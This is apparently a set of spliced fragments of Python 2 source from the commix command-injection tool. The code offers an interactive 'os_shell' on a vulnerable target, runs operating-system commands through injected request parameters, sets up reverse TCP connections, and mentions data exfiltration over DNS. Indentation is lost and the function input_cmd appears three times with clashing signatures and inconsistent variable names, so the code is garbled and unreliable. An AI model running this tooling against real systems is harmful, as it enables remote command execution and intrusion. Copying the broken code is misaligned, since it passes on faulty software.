if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check for any system file access options.
eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check if defined single cmd.
if menu.options.os_cmd:
eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Command execution results.
shell = eb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1]
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input(
"\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
# Delete previous shell (text) files (output)
delete_previous_shell(
separator, payload, TAG,
prefix, suffix,
http_request_method, url,
vuln_parameter,
OUTPUT_TEXTFILE, alter_shell)
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
warn_msg = "The " + err_msg + " options are not supported "
warn_msg += "by this module because of the structure of the exfiltrated data. "
warn_msg += "Please try using any unix-like commands manually."
print settings.print_warning_msg(warn_msg)
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n/q] > "
gotshell = raw_input("\n" + settings.print_info_msg(info_msg)).lower()
if gotshell in settings.CHOICE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__',
'') is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""os_shell""" + Style.RESET_ALL +
""") > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
warn_msg = "You are already into the 'os_shell' mode."
print settings.print_warning_msg(warn_msg) + "\n"
elif cmd.lower() == "reverse_tcp":
warn_msg = "This option is not supported by this module."
print settings.print_warning_msg(warn_msg) + "\n"
else:
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd, url,
vuln_parameter)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOICE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOICE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
print Fore.YELLOW + settings.WARNING_SIGN + "The " + err_msg + " options are not supported by this module because of the structure of the exfiltrated data. Please try using any unix-like commands manually." + Style.RESET_ALL
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input(
"\n" + settings.QUESTION_SIGN +
"Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__',
'') is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""os_shell""" + Style.RESET_ALL +
""") > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(
settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(
cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd,
url, vuln_parameter)
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd, url,
vuln_parameter)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
